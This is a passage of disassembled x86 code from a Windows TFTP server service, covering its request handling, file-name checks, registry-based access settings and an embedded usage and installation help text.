push edi
mov [ebp+var_28], 2
call dword_1001124 ; bind
test eax, eax
jz short loc_10031A3
loc_1003191: ; CODE XREF: sub_1002F31+23C�j
call dword_10010F8 ; WSAGetLastError
loc_1003197: ; CODE XREF: sub_1002F31+226�j
push offset aInsufficientRe ; "Insufficient resources"
push 0
jmp loc_10032FA
; ---------------------------------------------------------------------------
loc_10031A3: ; CODE XREF: sub_1002F31+25E�j
push ebx
mov [esi+8], edi
call dword_1001044 ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_8], esi
movsd
movsd
movsd
movsd
xor edi, edi
push edi
push edi
push edi
push edi
call dword_1001040 ; CreateEventA
cmp eax, edi
mov [ebx+0FFF8h], eax
jz short loc_10031E8
push 2
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, edi
mov [ebx+0FFFCh], eax
jnz short loc_10031F3
loc_10031E8: ; CODE XREF: sub_1002F31+2A0�j
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_1003312
; ---------------------------------------------------------------------------
loc_10031F3: ; CODE XREF: sub_1002F31+2B5�j
add ebx, 18h
push ebx
call sub_100287F
push 1
pop esi
push [ebp+var_4]
mov [ebp+var_14], esi
call sub_10028B5
mov ebx, eax
cmp ebx, edi
jz loc_1003312
lea edi, [ebx+10028h]
lea eax, [ebx+38h]
push edi
push eax
lea eax, [ebx+10024h]
mov [ebp+var_10], esi
push eax
mov eax, [ebp+var_C]
push esi
mov esi, [ebp+arg_0]
inc eax
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003312
cmp [edi], eax
jz short loc_1003255
mov eax, [esi+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_100325F
; ---------------------------------------------------------------------------
loc_1003255: ; CODE XREF: sub_1002F31+311�j
mov dword ptr [ebx+10000h], 3E8h
loc_100325F: ; CODE XREF: sub_1002F31+322�j
mov eax, [ebx+10000h]
push 0
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
push 1
pop edi
mov [ebx+24h], edi
mov eax, [esi+20h]
push esi
push ebx
mov [ebx+10018h], eax
mov [ebx+10014h], di
call sub_10027E1
push 10h
xor ecx, ecx
push [ebp+var_8]
cmp eax, ecx
mov [ebx+1000Ch], ecx
push ecx
push dword ptr [ebx+10020h]
jz short loc_10032D9
lea eax, [ebx+38h]
push eax
push [ebp+var_4]
call dword_1001130 ; sendto
mov ecx, [ebx+1001Ch]
cmp ecx, [esi+20h]
jnb short loc_10032E9
mov [ebx+10030h], edi
jmp short loc_10032E9
; ---------------------------------------------------------------------------
loc_10032D9: ; CODE XREF: sub_1002F31+386�j
add esi, 0FFF1h
push esi
push [ebp+var_4]
call dword_1001130 ; sendto
loc_10032E9: ; CODE XREF: sub_1002F31+39E�j
; sub_1002F31+3A6�j
cmp eax, 0FFFFFFFFh
jnz short loc_1003312
call dword_10010F8 ; WSAGetLastError
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_10032F6: ; CODE XREF: sub_1002F31+100�j
push 0
push 4
loc_10032FA: ; CODE XREF: sub_1002F31+26D�j
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
loc_1003308: ; CODE XREF: sub_1002F31+1E0�j
call sub_100230A
jmp short loc_1003312
; ---------------------------------------------------------------------------
loc_100330F: ; CODE XREF: sub_1002F31+27�j
mov ebx, [ebp+arg_0]
loc_1003312: ; CODE XREF: sub_1002F31+2BD�j
; sub_1002F31+2DD�j ...
test ebx, ebx
jz short loc_1003331
cmp [ebp+var_10], 0
jz short loc_1003323
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1003323: ; CODE XREF: sub_1002F31+3E9�j
cmp [ebp+var_14], 0
jnz short loc_1003331
push ebx
call dword_10010A0 ; free
pop ecx
loc_1003331: ; CODE XREF: sub_1002F31+50�j
; sub_1002F31+3E3�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_1002F31 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100333A proc near ; DATA XREF: sub_1001A91+20F�o
var_28 = word ptr -28h
var_26 = word ptr -26h
var_24 = dword ptr -24h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 28h
and [ebp+var_10], 0
and [ebp+var_14], 0
push ebx
push esi
push edi
push 10034h
call dword_1001094 ; malloc
mov ebx, eax
pop ecx
test ebx, ebx
jz loc_1003731
mov ecx, 400Dh
xor eax, eax
mov edi, ebx
push 0FFBAh
rep stosd
mov eax, [ebp+arg_0]
lea esi, [eax+36h]
push esi
mov [ebp+var_4], esi
call sub_1002F0E
test eax, eax
jz loc_1003712
mov edi, esi
or ecx, 0FFFFFFFFh
xor eax, eax
repne scasb
mov edi, [ebp+arg_0]
not ecx
push dword ptr [edi+10h]
dec ecx
lea esi, [ecx+esi+1]
call dword_1001120 ; inet_ntoa
mov [ebp+var_18], eax
mov ax, [edi+0Eh]
push eax
call dword_1001104 ; ntohs
cmp byte ptr [esi], 0
mov edi, esi
mov [ebp+var_C], edi
jz short loc_10033E1
loc_10033BC: ; CODE XREF: sub_100333A+A2�j
movsx eax, byte ptr [edi]
push eax
call dword_100114C ; isupper
test eax, eax
movsx eax, byte ptr [edi]
pop ecx
jz short loc_10033D6
push eax
call dword_1001150 ; tolower
pop ecx
loc_10033D6: ; CODE XREF: sub_100333A+92�j
mov [edi], al
inc edi
cmp byte ptr [edi], 0
jnz short loc_10033BC
mov [ebp+var_C], edi
loc_10033E1: ; CODE XREF: sub_100333A+80�j
mov eax, offset aNetascii ; "netascii"
mov edi, esi
loc_10033E8: ; CODE XREF: sub_100333A+CA�j
mov dl, [edi]
mov cl, dl
cmp dl, [eax]
jnz short loc_100340A
test cl, cl
jz short loc_1003406
mov dl, [edi+1]
mov cl, dl
cmp dl, [eax+1]
jnz short loc_100340A
inc edi
inc edi
inc eax
inc eax
test cl, cl
jnz short loc_10033E8
loc_1003406: ; CODE XREF: sub_100333A+B8�j
xor eax, eax
jmp short loc_100340F
; ---------------------------------------------------------------------------
loc_100340A: ; CODE XREF: sub_100333A+B4�j
; sub_100333A+C2�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100340F: ; CODE XREF: sub_100333A+CE�j
test eax, eax
jnz short loc_100341F
mov dword ptr [ebx+10030h], 4000h
jmp short loc_100345D
; ---------------------------------------------------------------------------
loc_100341F: ; CODE XREF: sub_100333A+D7�j
mov edi, offset aOctet ; "octet"
loc_1003424: ; CODE XREF: sub_100333A+106�j
mov cl, [esi]
mov al, cl
cmp cl, [edi]
jnz short loc_1003446
test al, al
jz short loc_1003442
mov cl, [esi+1]
mov al, cl
cmp cl, [edi+1]
jnz short loc_1003446
inc esi
inc esi
inc edi
inc edi
test al, al
jnz short loc_1003424
loc_1003442: ; CODE XREF: sub_100333A+F4�j
xor eax, eax
jmp short loc_100344B
; ---------------------------------------------------------------------------
loc_1003446: ; CODE XREF: sub_100333A+F0�j
; sub_100333A+FE�j
sbb eax, eax
sbb eax, 0FFFFFFFFh
loc_100344B: ; CODE XREF: sub_100333A+10A�j
test eax, eax
jnz loc_10036F8
mov dword ptr [ebx+10030h], 8000h
loc_100345D: ; CODE XREF: sub_100333A+E3�j
mov eax, [ebp+arg_0]
mov edi, [ebp+var_4]
or ecx, 0FFFFFFFFh
lea edx, [eax+1FFADh]
xor eax, eax
repne scasb
not ecx
sub edi, ecx
push edx
mov eax, ecx
mov esi, edi
mov edi, edx
mov [ebp+var_8], edx
shr ecx, 2
rep movsd
mov ecx, eax
and ecx, 3
rep movsb
call sub_100261E
test eax, eax
jnz short loc_100349A
push offset aMalformedFileN ; "Malformed file name"
jmp short loc_10034DF
; ---------------------------------------------------------------------------
loc_100349A: ; CODE XREF: sub_100333A+157�j
push [ebp+var_18]
push offset dword_1005D20
call sub_10039D6
test eax, eax
jz loc_10036EC
push [ebp+var_4]
push offset dword_1005D90
call sub_10039D6
test eax, eax
jz loc_10036EC
push (offset dword_1005E07+1)
push 0FFBCh
push [ebp+var_8]
call sub_100273D
test eax, eax
jnz short loc_10034E6
push offset aFileNameTooLon ; "File name too long"
loc_10034DF: ; CODE XREF: sub_100333A+15E�j
push 0
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_10034E6: ; CODE XREF: sub_100333A+19E�j
push 180h
push 8302h
push [ebp+var_8]
call dword_10010E4 ; _open
add esp, 0Ch
cmp eax, 0FFFFFFFFh
mov [ebx+1002Ch], eax
jnz short loc_100351E
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
jmp loc_10036F2
; ---------------------------------------------------------------------------
loc_100351E: ; CODE XREF: sub_100333A+1CB�j
xor esi, esi
push esi
push 2
push 2
call dword_100112C ; socket
mov edi, eax
cmp edi, 0FFFFFFFFh
mov [ebp+var_4], edi
jnz short loc_1003546
call dword_10010F8 ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push esi
jmp loc_10036FC
; ---------------------------------------------------------------------------
loc_1003546: ; CODE XREF: sub_100333A+1F9�j
mov [ebp+var_26], si
mov esi, [ebp+arg_0]
push 10h
mov [ebp+var_28], 2
mov eax, [esi+1Ch]
mov [ebp+var_24], eax
lea eax, [ebp+var_28]
push eax
push edi
call dword_1001124 ; bind
test eax, eax
jz short loc_100358A
call dword_10010F8 ; WSAGetLastError
push offset aInsufficientRe ; "Insufficient resources"
push 0
push dword ptr [esi+8]
lea eax, [esi+0FFF1h]
add esi, 0Ch
push eax
push esi
jmp loc_100370D
; ---------------------------------------------------------------------------
loc_100358A: ; CODE XREF: sub_100333A+22E�j
lea eax, [ebx+10028h]
mov [esi+8], edi
push eax
lea eax, [ebx+38h]
push eax
lea eax, [ebx+10024h]
push eax
mov eax, [ebp+var_C]
inc eax
push 2
push eax
push esi
call sub_10023D8
test eax, eax
jnz loc_1003712
push ebx
call dword_1001044 ; InitializeCriticalSection
mov [ebx+20h], edi
add esi, 0Ch
lea edi, [ebx+28h]
mov [ebp+var_18], esi
movsd
movsd
movsd
movsd
xor esi, esi
push esi
push esi
push esi
push esi
call dword_1001040 ; CreateEventA
cmp eax, esi
mov [ebx+0FFF8h], eax
jz short loc_10035F8
push 2
pop edi
push edi
push eax
push [ebp+var_4]
call sub_100188E
cmp eax, esi
mov [ebx+0FFFCh], eax
jnz short loc_1003603
loc_10035F8: ; CODE XREF: sub_100333A+2A5�j
call dword_1001038 ; RtlGetLastWin32Error
jmp loc_1003712
; ---------------------------------------------------------------------------
loc_1003603: ; CODE XREF: sub_100333A+2BC�j
add ebx, 18h
push ebx
call sub_100287F
push [ebp+var_4]
mov [ebp+var_14], 1
call sub_10028B5
mov ebx, eax
cmp ebx, esi
jz loc_1003712
xor esi, esi
mov [ebp+var_10], 1
cmp [ebx+10028h], esi
jz short loc_100364A
mov eax, [ebp+arg_0]
mov eax, [eax+28h]
imul eax, 3E8h
mov [ebx+10000h], eax
jmp short loc_1003654
; ---------------------------------------------------------------------------
loc_100364A: ; CODE XREF: sub_100333A+2FA�j
mov dword ptr [ebx+10000h], 3E8h
loc_1003654: ; CODE XREF: sub_100333A+30E�j
mov eax, [ebx+10000h]
push esi
push eax
push eax
push dword ptr [ebx+20h]
lea eax, [ebx+10004h]
push offset sub_1002A3D
push eax
push dword_10060A0
call dword_1001178 ; RtlCreateTimer
mov eax, [ebp+arg_0]
mov ecx, [ebx+10024h]
mov [ebx+24h], edi
cmp ecx, esi
mov eax, [eax+20h]
mov [ebx+10018h], eax
lea eax, [ebx+10024h]
jz short loc_10036A1
mov [ebx+10020h], ecx
mov [eax], esi
jmp short loc_10036C5
; ---------------------------------------------------------------------------
loc_10036A1: ; CODE XREF: sub_100333A+35B�j
mov esi, dword_1001104
push 4
pop edi
push edi
call esi ; dword_1001104
mov [ebx+38h], ax
mov ax, [ebx+10014h]
push eax
call esi ; dword_1001104
mov [ebx+3Ah], ax
mov [ebx+10020h], edi
loc_10036C5: ; CODE XREF: sub_100333A+365�j
push 10h
lea eax, [ebx+38h]
push [ebp+var_18]
push 0
push dword ptr [ebx+10020h]
push eax
push [ebp+var_4]
call dword_1001130 ; sendto
cmp eax, 0FFFFFFFFh
jnz short loc_1003712
call dword_10010F8 ; WSAGetLastError
jmp short loc_1003712
; ---------------------------------------------------------------------------
loc_10036EC: ; CODE XREF: sub_100333A+16F�j
; sub_100333A+184�j
call dword_10010AC ; _errno
loc_10036F2: ; CODE XREF: sub_100333A+1DF�j
push 0
push 2
jmp short loc_10036FC
; ---------------------------------------------------------------------------
loc_10036F8: ; CODE XREF: sub_100333A+113�j
push 0
push 4
loc_10036FC: ; CODE XREF: sub_100333A+1A7�j
; sub_100333A+207�j ...
mov eax, [ebp+arg_0]
push dword ptr [eax+8]
lea ecx, [eax+0FFF1h]
add eax, 0Ch
push ecx
push eax
loc_100370D: ; CODE XREF: sub_100333A+24B�j
call sub_100230A
loc_1003712: ; CODE XREF: sub_100333A+48�j
; sub_100333A+274�j ...
test ebx, ebx
jz short loc_1003731
cmp [ebp+var_10], 0
jz short loc_1003723
push ebx
call dword_100104C ; RtlLeaveCriticalSection
loc_1003723: ; CODE XREF: sub_100333A+3E0�j
cmp [ebp+var_14], 0
jnz short loc_1003731
push ebx
call dword_10010A0 ; free
pop ecx
loc_1003731: ; CODE XREF: sub_100333A+21�j
; sub_100333A+3DA�j ...
pop edi
pop esi
xor eax, eax
pop ebx
leave
retn 4
sub_100333A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_100373A proc near ; CODE XREF: sub_1002CE6+D7�p
var_1FF70 = byte ptr -1FF70h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov eax, 1FF70h
call sub_1003A3E ; _chkstk
cmp [ebp+arg_C], 8000h
push esi
push edi
jnz short loc_100375A
push [ebp+arg_8]
push [ebp+arg_4]
jmp short loc_1003792
; ---------------------------------------------------------------------------
loc_100375A: ; CODE XREF: sub_100373A+16�j
mov edx, [ebp+arg_4]
xor ecx, ecx
xor esi, esi
cmp [ebp+arg_8], ecx
jle short loc_1003790
mov edi, [ebp+arg_10]
loc_1003769: ; CODE XREF: sub_100373A+54�j
cmp byte ptr [edi], 0Dh
jnz short loc_1003779
cmp byte ptr [ecx+edx], 0
jnz short loc_1003779
and byte ptr [edi], 0
jmp short loc_100378A
; ---------------------------------------------------------------------------
loc_1003779: ; CODE XREF: sub_100373A+32�j
; sub_100373A+38�j
mov al, [ecx+edx]
mov [ebp+esi+var_1FF70], al
inc esi
cmp al, 0Dh
jnz short loc_100378A
mov [edi], al
loc_100378A: ; CODE XREF: sub_100373A+3D�j
; sub_100373A+4C�j
inc ecx
cmp ecx, [ebp+arg_8]
jl short loc_1003769
loc_1003790: ; CODE XREF: sub_100373A+2A�j
push esi
push edx
loc_1003792: ; CODE XREF: sub_100373A+1E�j
push [ebp+arg_0]
call dword_10010E8 ; _write
mov edi, eax
add esp, 0Ch
cmp edi, 0FFFFFFFFh
jnz short loc_10037B7
mov esi, dword_10010AC
call esi ; dword_10010AC
call esi ; dword_10010AC
push dword ptr [eax]
call dword_100102C ; RtlSetLastWin32Error
loc_10037B7: ; CODE XREF: sub_100373A+69�j
mov eax, edi
pop edi
pop esi
leave
retn 14h
sub_100373A endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10037BF proc near ; CODE XREF: sub_1001665:loc_10017F3�p
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
sub esp, 10h
lea eax, [ebp+var_10]
push ebx
xor ebx, ebx
push eax
push 0F003Fh
push ebx
push offset aSystemCurrentc ; "System\\CurrentControlSet\\Services\\tftpd"...
push 80000002h
mov [ebp+var_4], ebx
call dword_1001000 ; RegOpenKeyExA
cmp eax, ebx
jz short loc_10037F6
call dword_1001038 ; RtlGetLastWin32Error
xor eax, eax
jmp loc_100390D
; ---------------------------------------------------------------------------
loc_10037F6: ; CODE XREF: sub_10037BF+28�j
cmp byte ptr dword_1005E07+1, bl
push edi
push esi
mov esi, dword_1001008
jnz short loc_100383C
lea eax, [ebp+var_8]
mov [ebp+var_8], 1F4h
push eax
lea eax, [ebp+var_C]
push (offset dword_1005E07+1)
push eax
push ebx
push offset aDirectory ; "directory"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003831
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100383C
; ---------------------------------------------------------------------------
loc_1003831: ; CODE XREF: sub_10037BF+68�j
push 1
pop eax
cmp [ebp+var_C], eax
jnz short loc_100383C
mov [ebp+var_4], eax
loc_100383C: ; CODE XREF: sub_10037BF+45�j
; sub_10037BF+70�j ...
push 32h
lea eax, [ebp+var_8]
pop edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005CE8
push eax
push ebx
push offset aClients ; "clients"
push [ebp+var_10]
mov [ebp+var_8], edi
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003866
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100386F
; ---------------------------------------------------------------------------
loc_1003866: ; CODE XREF: sub_10037BF+9D�j
cmp [ebp+var_C], 1
jnz short loc_100386F
inc [ebp+var_4]
loc_100386F: ; CODE XREF: sub_10037BF+A5�j
; sub_10037BF+AB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D20
push eax
push ebx
push offset aMasters ; "masters"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_1003896
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_100389F
; ---------------------------------------------------------------------------
loc_1003896: ; CODE XREF: sub_10037BF+CD�j
cmp [ebp+var_C], 1
jnz short loc_100389F
inc [ebp+var_4]
loc_100389F: ; CODE XREF: sub_10037BF+D5�j
; sub_10037BF+DB�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D58
push eax
push ebx
push offset aReadable ; "readable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038C6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_10038CF
; ---------------------------------------------------------------------------
loc_10038C6: ; CODE XREF: sub_10037BF+FD�j
cmp [ebp+var_C], 1
jnz short loc_10038CF
inc [ebp+var_4]
loc_10038CF: ; CODE XREF: sub_10037BF+105�j
; sub_10037BF+10B�j
lea eax, [ebp+var_8]
mov [ebp+var_8], edi
push eax
lea eax, [ebp+var_C]
push offset dword_1005D90
push eax
push ebx
push offset aWritable ; "writable"
push [ebp+var_10]
call esi ; dword_1001008
cmp eax, ebx
jz short loc_10038F6
call dword_1001038 ; RtlGetLastWin32Error
jmp short loc_10038FF
; ---------------------------------------------------------------------------
loc_10038F6: ; CODE XREF: sub_10037BF+12D�j
cmp [ebp+var_C], 1
jnz short loc_10038FF
inc [ebp+var_4]
loc_10038FF: ; CODE XREF: sub_10037BF+135�j
; sub_10037BF+13B�j
push [ebp+var_10]
call dword_100100C ; RegCloseKey
mov eax, [ebp+var_4]
pop esi
pop edi
loc_100390D: ; CODE XREF: sub_10037BF+32�j
pop ebx
leave
retn
sub_10037BF endp
; =============== S U B R O U T I N E =======================================
sub_1003910 proc near ; CODE XREF: sub_1001665+193�p
var_1F4 = byte ptr -1F4h
sub esp, 1F4h
cmp byte ptr dword_1005E07+1, 0
push ebx
push ebp
push esi
push edi
mov ebp, 1F4h
mov ebx, (offset dword_1005E07+1)
jnz short loc_100393D
push ebp
push offset aTftpdroot ; "\\tftpdroot\\"
push ebx
call dword_1001148 ; strncpy
add esp, 0Ch
loc_100393D: ; CODE XREF: sub_1003910+1B�j
lea eax, [esp+204h+var_1F4]
push ebp
push eax
push ebx
call dword_1001020 ; ExpandEnvironmentStringsA
test eax, eax
jnz short loc_1003952
push 57h
jmp short loc_10039CA
; ---------------------------------------------------------------------------
loc_1003952: ; CODE XREF: sub_1003910+3C�j
mov ecx, eax
lea esi, [esp+204h+var_1F4]
mov edi, ebx
or edx, 0FFFFFFFFh
shr ecx, 2
rep movsd
mov ecx, eax
xor eax, eax
and ecx, 3
rep movsb
mov edi, ebx
mov ecx, edx
repne scasb
not ecx
dec ecx
cmp byte ptr dword_1005E07[ecx], 2Fh
lea eax, dword_1005E07[ecx]
jnz short loc_1003986
mov byte ptr [eax], 5Ch
loc_1003986: ; CODE XREF: sub_1003910+71�j
cmp byte ptr [eax], 5Ch
jz short loc_10039B7
cmp ecx, ebp
jnb short loc_10039B7
mov edi, offset asc_100155C ; "\\"
mov ecx, edx
xor eax, eax
repne scasb
not ecx
sub edi, ecx
mov esi, edi
mov ebp, ecx
mov edi, ebx
mov ecx, edx
repne scasb
mov ecx, ebp
dec edi
shr ecx, 2
rep movsd
mov ecx, ebp
and ecx, 3
rep movsb
loc_10039B7: ; CODE XREF: sub_1003910+79�j
; sub_1003910+7D�j
mov edi, ebx
mov ecx, edx
xor eax, eax
push 1
repne scasb
not ecx
dec ecx
mov dword_1005FFC, ecx
loc_10039CA: ; CODE XREF: sub_1003910+40�j
pop eax
pop edi
pop esi
pop ebp
pop ebx
add esp, 1F4h
retn
sub_1003910 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10039D6 proc near ; CODE XREF: sub_1002F31+148�p
; sub_1002F31+159�p ...
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push esi
mov esi, [ebp+arg_0]
push edi
mov al, [esi]
test al, al
jz short loc_1003A2E
cmp al, 2Ah
jz short loc_1003A04
cmp al, 3Fh
jz short loc_10039F7
mov ecx, [ebp+arg_4]
cmp al, [ecx]
jnz short loc_1003A25
inc ecx
push ecx
jmp short loc_1003A01
; ---------------------------------------------------------------------------
loc_10039F7: ; CODE XREF: sub_10039D6+14�j
mov eax, [ebp+arg_4]
cmp byte ptr [eax], 0
jz short loc_1003A25
inc eax
push eax
loc_1003A01: ; CODE XREF: sub_10039D6+1F�j
inc esi
jmp short loc_1003A1B
; ---------------------------------------------------------------------------
loc_1003A04: ; CODE XREF: sub_10039D6+10�j
mov edi, [ebp+arg_4]
lea eax, [esi+1]
push edi
push eax
call sub_10039D6
test eax, eax
jnz short loc_1003A29
cmp [edi], al
jz short loc_1003A25
inc edi
push edi
loc_1003A1B: ; CODE XREF: sub_10039D6+2C�j
push esi
call sub_10039D6
test eax, eax
jnz short loc_1003A29
loc_1003A25: ; CODE XREF: sub_10039D6+1B�j
; sub_10039D6+27�j ...
xor eax, eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A29: ; CODE XREF: sub_10039D6+3D�j
; sub_10039D6+4D�j
push 1
pop eax
jmp short loc_1003A38
; ---------------------------------------------------------------------------
loc_1003A2E: ; CODE XREF: sub_10039D6+C�j
mov ecx, [ebp+arg_4]
xor eax, eax
cmp [ecx], al
setz al
loc_1003A38: ; CODE XREF: sub_10039D6+51�j
; sub_10039D6+56�j
pop edi
pop esi
pop ebp
retn 8
sub_10039D6 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A3E proc near ; CODE XREF: sub_1001A91+5�p
; sub_100230A+8�p ...
jmp dword_100116C
sub_1003A3E endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A44 proc near ; CODE XREF: sub_10018DB+FE�p
; sub_1002219+DA�p
jmp dword_1001138
sub_1003A44 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003A4A proc near ; CODE XREF: sub_1001FA6+1F�p
; sub_1001FA6+43�p
jmp dword_100113C
sub_1003A4A endp
; ---------------------------------------------------------------------------
loc_1003A50: ; CODE XREF: UPX1:01009168�j
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_1001560
push offset loc_1003BF0
mov eax, large fs:0
push eax
mov large fs:0, esp
add esp, 0FFFFFFE0h
push ebx
push esi
push edi
mov [ebp-18h], esp
mov dword ptr [ebp-4], 0
push 1
call dword_10010C4 ; __set_app_type
add esp, 4
mov dword_10062D0, 0FFFFFFFFh
mov dword_10062D4, 0FFFFFFFFh
call dword_10010C8 ; __p__fmode
mov ecx, dword_100600C
mov [eax], ecx
call dword_10010CC ; __p__commode
mov edx, dword_1006008
mov [eax], edx
mov eax, dword_10010D0
mov ecx, [eax]
mov dword_10062D8, ecx
call nullsub_2
mov eax, dword_1005DC4
test eax, eax
jnz short loc_1003AE1
push offset loc_1003BD0
call dword_1001084 ; __setusermatherr
add esp, 4
loc_1003AE1: ; CODE XREF: seg000:01003AD1�j
call sub_1003BB0
push offset dword_100500C
push offset dword_1005008
call sub_1003BA6 ; _initterm
add esp, 8
mov edx, dword_1006004
mov [ebp-28h], edx
lea eax, [ebp-28h]
push eax
mov ecx, dword_1006000
push ecx
lea edx, [ebp-20h]
push edx
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
push ecx
call dword_1001080 ; __getmainargs
add esp, 14h
push offset dword_1005004
push offset dword_1005000
call sub_1003BA6 ; _initterm
add esp, 8
call dword_10010D8 ; __p___initenv
mov edx, [ebp-20h]
mov [eax], edx
mov eax, [ebp-20h]
push eax
mov ecx, [ebp-2Ch]
push ecx
mov edx, [ebp-1Ch]
push edx
call sub_1001570
add esp, 0Ch
mov [ebp-24h], eax
push eax
call dword_10010EC ; exit
jmp short loc_1003B80
; ---------------------------------------------------------------------------
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-30h], ecx
push eax
push ecx
call sub_1003BA0
add esp, 8
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
mov edx, [ebp-30h]
push edx
call dword ptr loc_10010DD+3
loc_1003B80: ; CODE XREF: seg000:01003B5C�j
add esp, 4
mov dword ptr [ebp-4], 0FFFFFFFFh
mov ecx, [ebp-10h]
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA0 proc near ; CODE XREF: seg000:01003B6A�p
jmp dword ptr loc_10010DC
sub_1003BA0 endp
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BA6 proc near ; CODE XREF: seg000:01003AF0�p
; seg000:01003B2B�p
jmp dword_100107C
sub_1003BA6 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_1003BB0 proc near ; CODE XREF: seg000:loc_1003AE1�p
push 30000h
push 10000h
call sub_1003BF6 ; _controlfp
add esp, 8
retn
sub_1003BB0 endp
; ---------------------------------------------------------------------------
align 10h
loc_1003BD0: ; DATA XREF: seg000:01003AD3�o
xor eax, eax
retn
; ---------------------------------------------------------------------------
align 10h
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_2. PRESS KEYPAD "+" TO EXPAND]
align 10h
loc_1003BF0: ; DATA XREF: seg000:01003A5A�o
jmp dword ptr loc_10010C0
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_1003BF6 proc near ; CODE XREF: sub_1003BB0+A�p
jmp dword_10010BC
sub_1003BF6 endp
; ---------------------------------------------------------------------------
dd 501h dup(0)
dword_1005000 dd 0 dword_1005004 dd 0 dword_1005008 dd 0 dword_100500C dd 0 asc_1005010 db ' ================================================================'
; DATA XREF: sub_1001570+4D�o
db '======== ',0Ah
db 'Abstract: '
db ' ',0Ah
db ' This implements an RFC 783 tftp daemon. '
db ' ',0Ah
db ' It listens on port 69 for requests '
db ' ',0Ah
db ' and spawns a thread to process each request. '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'TFTPD USAGE and Installation: '
db ' ',0Ah
db ' '
db ' ',0Ah
db ' md d:/tftpd (the StartDirec'
db 'tory). ',0Ah
db ' copy //MohsinA_p90/test/tftpd.exe . '
db ' ',0Ah
db ' sc create tftpd binPath= d:/tftpd/tftpd.exe (give full path'
db '). ',0Ah
db ' sc query tftpd (check if insta'
db 'lled). ',0Ah
db ' '
db ' ',0Ah
db 'Start: '
db ' ',0Ah
db ' sc start tftpd -f (creates a log '
db 'file). ',0Ah
db 'or sc start tftpd '
db ' ',0Ah
db 'or net start tftpd '
db ' ',0Ah
db 'or sc start tftpd [-dStartDirectory] [-e] [-f] '
db ' ',0Ah
db ' Options: -e use event log. '
db ' ',0Ah
db ' -f log to file. '
db ' ',0Ah
db ' -dStartDirectory '
db ' ',0Ah
db 'Info: '
db ' ',0Ah
db ' sc interrogate tftpd (logs will be updated). '
db ' ',0Ah
db ' sc query tftpd Check whether running. '
db ' ',0Ah
db 'Stop: '
db ' ',0Ah
db ' sc stop tftpd '
db ' ',0Ah
db ' net stop tftpd '
db ' ',0Ah
db ' '
db ' ',0Ah
db 'Variables that control what files can be read/written and by whom'
db ': ',0Ah
db ' StartDirectory - only files there will be accessible. '
db ' ',0Ah
db ' LogFile is created here. '
db ' ',0Ah
db ' ValidClients - Clients matching this ip address can read files'
db '. ',0Ah
db ' eg. you can set it to "157.55.8?.*" '
db ' ',0Ah
db ' ValidMasters - clients matching this can write and read file'
db 's. ',0Ah
db ' eg. you can set it to "" and no one can write'
db '. ',0Ah
db ' ValidReadFiles - only matching files will be served out, eg. "'
db 'r*.t?t"',0Ah
